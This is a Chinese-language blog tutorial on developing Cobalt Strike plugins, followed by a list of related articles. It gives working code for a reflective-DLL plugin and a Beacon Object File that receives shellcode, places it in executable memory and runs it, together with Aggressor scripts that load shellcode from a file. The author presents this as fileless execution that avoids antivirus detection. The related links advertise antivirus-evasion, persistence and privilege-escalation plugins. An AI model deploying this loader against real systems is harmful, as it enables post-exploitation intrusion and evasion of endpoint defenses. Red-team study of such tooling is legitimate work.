轻松学会cobalt strike插件开发

最新推荐文章于 2025-04-24 19:54:05 发布
最新推荐文章于 2025-04-24 19:54:05 发布
阅读量936 收藏 4
点赞数 1
文章标签: python 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37561898/article/details/134474817
版权

Cobalt Strike简介

Cobalt Strike是一款美国RedTeam开发的渗透测试神器,常被业界人称为CS也被称为CS神器,在内网渗透中使用的频率较高。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能,是一款基于Java的渗透测试神器。

Cobalt Strike常用命令如下:

  1. help: 查看可用命令。
  2. getuid: 获取当前用户的权限。
  3. getsystem: 获取system权限。
  4. getprivs: 获取当前beacon里面的所有权限(这个用户现在能干嘛)。
  5. net domain_trusts: 列出域之间的信任关系。
  6. net logons:查看现在在登录的用户。
  7. net share:查看共享。
  8. shell xxx: 在命令行中执行xxx命令。
  9. powerpick xxx:不通过powershell来执行命令

插件开发

直接步入主题,先讲cs的插件开发RDI(ReflectiveDLLInject),cs提供bdllspawn方法来来反射dll执行代码。同时官方也提供了相关的使用文档和demo示例。Functions

我们直接下载提供的vs模版项目https://codeload.github.com/stephenfewer/ReflectiveDLLInjection/zip/refs/heads/master

之后就很简单了,vs打开项目直接编辑ReflectiveDll.c进行代码编写,我们这里接收命令行参数来进行弹窗打印

//===============================================================================================//

// This is a stub for the actuall functionality of the DLL.

//===============================================================================================//

#include "ReflectiveLoader.h"

#include <string>

#include <shellapi.h>

#pragma comment(lib, "Shell32.lib")

using namespace std;

std::string szargs;

std::wstring wszargs;

std::wstring wsHostFile;

int argc = 0;

LPWSTR* argv = NULL;

extern HINSTANCE hAppInstance;

wstring StringToWString(const string& str)

{

int length;

length = MultiByteToWideChar(CP_ACP, 0, str.c_str(), -1, NULL, 0);

wchar_t* wide_char = new wchar_t[length];

MultiByteToWideChar(CP_ACP, 0, str.c_str(), -1, wide_char, length);

wstring wstr(wide_char);

delete[] wide_char;

return wstr;

}

BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )

{

BOOL bReturnValue = TRUE;

switch( dwReason )

{

case DLL_QUERY_HMODULE:

if( lpReserved != NULL )

*(HMODULE *)lpReserved = hAppInstance;

break;

case DLL_PROCESS_ATTACH:

hAppInstance = hinstDLL;

printf("C++ ReflectiveDLL\n");

if (lpReserved != NULL) {

szargs = (PCHAR)lpReserved;

wszargs = StringToWString(szargs);

argv = CommandLineToArgvW(wszargs.data(), &argc);

}

MessageBox(NULL, argv[1], L"测试", MB_OK);

fflush(stdout);

ExitProcess(0);

break;

case DLL_PROCESS_DETACH:

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

break;

}

return bReturnValue;

}

写完之后编译dll,还需要使用bdllspawn来调用,redll.dll就是我们编写的dll名字,$args = substr($0, 2);为我们传入的参数

alias redll {

$args = substr($0, 2);

bdllspawn($1, script_resource("redll.dll"),$args, "dll", 5000, false);

}

直接导入编写好的插件执行

被提示远程线程注入了,原生cs的行为特征可能会触发杀软的主动防御,我们点允许就执行成功了,实现了无文件落地的执行dll功能。代表插件有Ladon。

想要RDI不被拦截我们可能需要更加深入的研究cs的代码机制,进行修改,但是这样就会变的更加繁琐。所以CS还有一个插件方法,BOF(Beacon Object File)

BOF介绍

的支持是在CobaltStrike4.1版本中新引入的功能。BOF文件是由c代码编译而来的可在Beacon进程中动态加载执行的二进制程序。无文件执行与无新进程创建的特性更加符合OPSEC的原则,适用于严苛的终端对抗场景。低开发门槛与便利的内部Beacon API调用与使得BOF特别适合后渗透阶段攻击工具的快速开发与移植。

跟RDI一样关于BOF,CS也提供了相关的文档进行解释和开发介绍

BOF C API

看不懂英文的兄弟请直接翻译,我这边讲的开发内容非常基础,想要更加深入的开发还是直接对照API文档来进行探索。

回到主题,BOF开发CS同样提供了相应的开发模版,我们只需要下载项目https://codeload.github.com/Cobalt-Strike/bof-vs

下载的压缩包需要解压到 C:\Users\你的用户名\Documents\Visual Studio 2022\Templates\ProjectTemplates

然后重启vs,新建BOF项目

然后就可以在bof.cpp进行代码编辑啦

#include <Windows.h>

#include "base\helpers.h"

#ifdef _DEBUG

#include "base\mock.h"

#undef DECLSPEC_IMPORT

#define DECLSPEC_IMPORT

#endif

extern "C" {

#include "beacon.h"

DFR(KERNEL32, GetLastError);

#define GetLastError KERNEL32$GetLastError

void go(char* args, int len) {

DFR_LOCAL(KERNEL32, GetSystemDirectoryA);

DFR_LOCAL(KERNEL32, CloseHandle);

DFR_LOCAL(KERNEL32, CreateMutexA);

DFR_LOCAL(KERNEL32, CreateProcessA);

DFR_LOCAL(KERNEL32, GetProcAddress);

DFR_LOCAL(KERNEL32, VirtualAlloc);

DFR_LOCAL(KERNEL32, VirtualFree);

DFR_LOCAL(KERNEL32, LoadLibraryA);

DFR_LOCAL(KERNEL32, ReleaseMutex);

DFR_LOCAL(KERNEL32, CreateFileA);

DFR_LOCAL(KERNEL32, GetFileSize);

DFR_LOCAL(KERNEL32, ReadFile);

DFR_LOCAL(KERNEL32, VirtualProtect);

char* sc_ptr;

SIZE_T sc_len;

DWORD pid;

datap parser;

BeaconDataParse(&parser, args, len);

sc_ptr = BeaconDataExtract(&parser, NULL);

DWORD dataSize = BeaconDataLength(&parser);

DWORD shellCodeLength = dataSize - (sc_ptr - parser.buffer);

if (sc_ptr == NULL) {

BeaconPrintf(CALLBACK_ERROR, "Error: Failed to sc_ptr\n");

return;

}

LPVOID pMemory = VirtualAlloc(NULL, 900000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

if (pMemory == NULL) {

BeaconPrintf(CALLBACK_ERROR, "Error: Failed top Memory\n");

return;

}

DWORD old = 0;

if (!VirtualProtect(pMemory, 900000, PAGE_EXECUTE_READWRITE, &old)) {

BeaconPrintf(CALLBACK_ERROR, "Error: Failed to old\n");

return;

}

for (int i = 0; i < shellCodeLength; ++i) {

reinterpret_cast<unsigned char*>(pMemory)[i] = sc_ptr[i];

}

typedef void(*SHELLCODE)();

SHELLCODE sc = reinterpret_cast<SHELLCODE>(pMemory);

sc();

VirtualFree(pMemory, NULL, MEM_RELEASE);

}

}

#if defined(_DEBUG) && !defined(_GTEST)

int main(int argc, char* argv[]) {

bof::runMocked<>(go);

return 0;

}

// Define unit tests

#elif defined(_GTEST)

#include <gtest\gtest.h>

TEST(BofTest, Test1) {

std::vector<bof::output::OutputEntry> got =

bof::runMocked<>(go);

std::vector<bof::output::OutputEntry> expected = {

{CALLBACK_OUTPUT, "System Directory: C:\\Windows\\system32"}

};

ASSERT_EQ(expected.size(), got.size());

ASSERT_STRCASEEQ(expected[0].output.c_str(), got[0].output.c_str());

}

#endif

我们需要对我们使用的函数按照他给出的模版进行导入,就像下面的示例一样

DFR_LOCAL(KERNEL32, GetSystemDirectoryA);

DFR_LOCAL(KERNEL32, VirtualAlloc);

DFR_LOCAL(KERNEL32, VirtualFree);

DFR_LOCAL(KERNEL32, VirtualProtect);

上面的示例代码是从CS控制台接收shellcode,进行动态执行。用到了几个BOF c API

BeaconDataParse(&parser, args, len); //准备一个数据分析器以从指定的缓冲区中提取参数。

sc_ptr = BeaconDataExtract(&parser, NULL);//接收参数

DWORD dataSize = BeaconDataLength(&parser);//这边是计算data数据大小,我们用来计算shellcode

BeaconPrintf(CALLBACK_ERROR, "Error: Failed to old\n");//打印到CS控制台

然后其他代码就是正常的shellcode加载代码,光这样我们是无法直接从cs控制台获取shellcode的,所以我们还需要一个插件来读取指定文件的shellcode。

alias run12 {

local('$handle $data $args $sc_data');

$barch = barch($1);

$handle = openf(script_resource("bof.obj"));

$data = readb($handle, -1);

closef($handle);

$sc_handle = openf($2);//读取文件数据

$sc_data = readb($sc_handle, -1);

closef($sc_handle);

$args = bof_pack($1, "b",$sc_data);

beacon_inline_execute($1, $data, "go", $args);

}

这边我们用到了bof_pack,相关文档如下

Functions

还有beacon_inline_execute

Aggressor Script and BOFs

$sc_handle = openf($2);//读取文件数据

$sc_data = readb($sc_handle, -1);

closef($sc_handle);

从cs命令行把读取到的文件内容传递给$sc_data,这边传递的为shellcode

$args = bof_pack($1, "b",$sc_data);

beacon_inline_execute($1, $data, "go", $args);

把shellcode传入到我们的obj项目的go方法也就是inline_execute

写完之后我们把项目编译成obj,cna脚本加载到我们的cs




然后我们cs控制台执行

shellcode不落地执行成功,以此延伸PEloader。直接内存不落地加载EXE文件

但是有一个坑点就是,如果我们执行的exe大于10M就会引发报错,我们需要在profile中设置tasks_max_size的值

参考文档:Profile Language

以上就是CS插件开发的基础知识,讲的不清楚的地方请自行查阅官方文档,每一步的文档我都标注出来了

CobaltStrike插件开发指南
TechProX的博客
08-13 193
点击"Load"按钮,并选择刚才编译的插件文件(HelloWorld.class)。插件加载成功后,在"Script Manager"对话框中将显示插件的信息。通过编写自定义插件,我们可以根据具体的需求增强CobaltStrike的功能。本文介绍了一个简单的示例插件,但您可以根据自己的需求和创意编写更加复杂和有用的插件CobaltStrike是一款非常热门和功能强大的渗透测试工具,通过使用插件,我们可以增强CobaltStrike的功能,提高我们的渗透测试效率。这个文件将包含我们插件的代码。
Cobalt_Strike扩展插件
weixin_41082546的博客
08-30 3840
https://github.com/harleyQu1nn/AggressorScripts https://github.com/bluscreenofjeff/AggressorScripts https://github.com/michalkoczwara/aggressor_scripts_collection https://github.com/vysecurity/Aggress...
cobaltstrike扩展_CobaltStrike插件开发官方指南 Part4
weixin_39830200的博客
12-22 218
翻译+实践
CobaltStrike插件开发-learning-day4
问题很多的小明
03-19 970
CobaltStrike插件的场景 执行系统命令 bshell($1,"whoami"); $1为当前beacon的id 具体弹框出来看一下:show_message($1) 每个会话都是随机的 模拟一个简单的场景,实现上线用户信息的查看,code如下,注意以下三种写法都可 sub showuser { show_message($1); bshell($1, "query user"); } popup beacon_bottom { menu "查看用户信息"{
cobaltstrike扩展_CobaltStrike插件开发官方指南 Part3
weixin_39626409的博客
12-22 265
CobaltStrike插件开发官方指南 Part3翻译+实践
CobaltStrike插件开发-learning-day3
问题很多的小明
03-18 656
CobaltStrike插件学习-doing-day3 快捷键 bind Ctrl+S { show_message("hello,word!"); } 菜单编写 println("-------------菜单创建--------"); popup good{ item("&打工人",{url_open("https://www.baidu.com")});#子菜单 separator(); item("&打工魂",{url_open("https://m
CobaltStrike插件合集
qq_56426046的博客
01-03 1062
春城无处不飞花,寒食东风御柳斜。
cobaltstrike:cobaltstrike插件
05-06
cobaltstrike 现在完成的功能 1.定位域管理员(PsLoggedo,PVEFindADUser,netview) 2.信息收集(采用ADfind) 3.权限维持(增加了万能密码,以及白银票据) 4.内网扫描(nbtscan(linux/windows通用)) 5.dump数据库hash(支持mysql/mssql(快速获取数据库的hash值)) 6.增加了Everything内网搜索文件一键建立http服务进行搜索文件,并且隐藏运行图标以及图形化界面:使用方法 内网ip:49389端口(用户名:admin,密码:admin123,端口:49389) 7.其他小功能 这个项目持续更新,这个插件只会选择在平常内网经常用到工具,不会增加多余的工具 :crown: 更新记录 v1.0 2021/03/11 由于从开年到现在有很多事情要忙所以这款工具在将在5月份进行大更新,更新内容有大幅度提升。
工具开发CobaltStrike插件编写入门(三)
weixin_42282189的博客
12-09 1429
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 引言 之前发了两篇关于cs插件编写的基础文章,写的是杀软判断的功能,用到的都是sleep脚本基础语法,这次想写一篇关于sleep脚本的高级用法的文章,那就是使用sleep脚本调用java对象。 本篇主要用sleep脚本调用java对象来实现一个powershell_encoder的功能。 项目源码:https://github.com/gooderbrother/Sleep_powershell_encoder .
CobaltStrike插件PostExpKit更新 - 20240423
潇湘信安的博客
06-24 1876
​前段时间分享了PostExpKit插件的提权模块:简单好用的CobaltStrike提权插件,这次主要更新一些我认为比较实用的功能:1、2、3过部分防护场景,BOF合集见原项目,其他都是一些命令增强脚本......。
CobaltStrike五大插件带你起飞:巨龙拉冬、LSTR、欧拉、梼杌、谢公子的插件
06-24
CobaltStrike扩展插件可谓是Cobalt Strike如虎添翼的模块,可自定义丰富Cobalt Strike的功能,好比你满配的装备。内网横向可以起飞。。。
cPlug:CobaltStrike插件可从Sifter内部启动和利用Cobalt Strike(本地或远程)
05-24
出口 s1l3nt78 死亡兔子集体因为枚举是关键 释放 @Codename: c @Version: .2 - Added functionality to start a teamserver hosted on a remote server [ Sifter的]最新版本的zip软件包可以从下载[ Sifter ]的最新.deb软件包也可以从下载较旧的版本可以在找到 筛选器插件 #发布的扩展 -Sifter的g扩展区提供GUI覆盖'->建立在eDEX-UI之上-F -Sifter的f扩展为Sifter提供了DanderFuzz开发插件'->由EquationGroup创建的框架,由The Shadow Brokers提供-M -Sifter的m扩展提供了恶意软件分析工具。 -C -Sifter的c扩展只是一个小脚本,允许将CobaltStrike添加到利用框架中。 (将不会提供Co
Z1-AggressorScripts:适用于Cobalt Strike插件
04-30
Z1-AggressorScripts 适用于Cobalt Strike 3.x & 4.x 的插件。 2020.12.20 更新: 更新工具。 2020.11.21 更新: 辅助模块的zip打包更换成uknow师傅的,内存加载无需上传。 权限维持模块新增创建自启动运行,包括添加注册表,添加启动文件夹,创建启动服务三种方式。 2020.11.20 更新: 内网穿透模块新增支持nps。 frp由之前的upx压缩版本换成未压缩版,upx压缩后的frp32位和nps都会在360上报毒,索性全部换成原版。但是这就项目导致体积由20几M增加到了30几M,强烈建议到下载发行版压缩文件。 windows-npc64位通过cs上传后运行会报错,不知道是不是我个人环境问题,所以npc只上传32位,不影响使用。 提权 获取可提取漏洞 juicypotato MS14-058 MS15-051 MS16-016
cobalt strike插件的使用(超细!)
技术超强的网络安全平台
12-27 2667
cobalt strike插件的使用(超细!)前言cobaltstrike作为渗透测试中不可缺少的利器,那么它到底厉害在哪里呢?在默认没有安装扩展的情况下可能功能并不是特别多,多数人会认为我已经基本掌握了cs的使用,但扩展就相当于我们的武器库,武器越多当然打起来也越爽,每次看别人的文章,发现自己的cs不是缺这就是缺那,压根没有办法实践,而且也很少有人会刻意说是哪个插件、哪里下载,这就给我们带来了非常大的困扰,索性就搜罗网上的插件进行全面加强自己的武器库,感谢大佬们分享的插件,以下使用的插件,将在文末提供。
CobaltStrike使用插件实现免杀
m0_74025111的博客
04-24 1030
免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。找小的 ico 图标,比如 5kb、10kb 的。Cobalt Stirke 插件,依赖 nim。导入免杀插件,点击Script Manager。启动cs,点击Connect。可以直接生成免杀shell。
CobaltStrike 插件编写入门教程(二)
weixin_42282189的博客
11-01 1486
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 引言 之前写了一个可以离线判断目标beacon是否存在杀软的小插件,但是觉得还是不够完美。于是乎决定将其改造一下。 先看之前的效果: 之前的版本是将杀软信息输出到了eventlog中,这样在工作的时候会导致eventlog消息太多,看起来太杂乱。 0x01 思路 在cs中有一个内置的cna脚本叫做default.cna。这个脚本可以在cs官网上下载。 我注意到其中有一个名为BEACON_SBAR_LEFT的设.
【渗透测试】Cobalt Strike 插件 CrossC2(v3.0.2) 安装使用
热门推荐
SunnyCat
02-09 1万+
目录一、起因二、安装1)客户端配置2)vps服务端操作3)客户端cs操作三、上线1)二进制木马文件上线2)命令行上线 一、起因 cobaltstike默认只生成windows载荷,不能上线linux主机,想上线linux主机需要通过ssh回话的方式,CrossC2可以通过生成linux载荷直接上线linux主机(或Mac) 项目地址:https://github.com/gloxec/CrossC2/ 参考地址:https://gloxec.github.io/CrossC2/zh_cn/ 二、安装 需要准
Python学习笔记(三)(程序流程控制)
最新发布
wsys_yysn的博客
04-24 855
条件语句:通过实现分支逻辑。循环语句for遍历序列,while满足条件时循环。流程控制break终止循环,continue跳过当前迭代,pass占位。异常处理保证程序健壮性。掌握这些流程控制工具,可以编写更灵活、高效的 Python 程序!
cobalt strike插件安装
02-09
### 安装Cobalt Strike插件的方法 对于希望扩展Cobalt Strike功能的用户来说,安装插件是一个重要的技能。通常情况下,Cobalt Strike支持通过特定的方式加载这些增强模块。 #### 插件放置位置 为了使Cobalt Strike能够识别并使用新的插件,需要将下载得到或者自行开发完成后的`.jar`文件放入指定目录下。此路径一般位于用户的主配置文件夹内名为`plugins`的子文件夹中[^4]。 ```bash ~/.cobaltstrike/plugins/ ``` #### 加载插件 当把所需的插件放到上述提到的位置之后,在启动Cobalt Strike之前还需要确保软件可以自动检测到新加入的内容。这可以通过编辑团队服务器配置文件来实现,即在`teamserver`命令行参数后面加上相应的选项指向包含所有自定义设置(包括启用哪些第三方组件)的JSON格式文档[^5]。 ```json { "plugin_dirs": [ "~/.cobaltstrike/plugins/" ] } ``` 随后按照常规流程开启Team Server服务端程序即可让其读取新增加的功能模块: ```bash ./teamserver <ip> <password> config.json ``` 一旦成功连接至该实例,则可以在客户端界面上看到已激活的各种附加工具列表,并能立即投入使用它们所提供的特色能力[^6]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值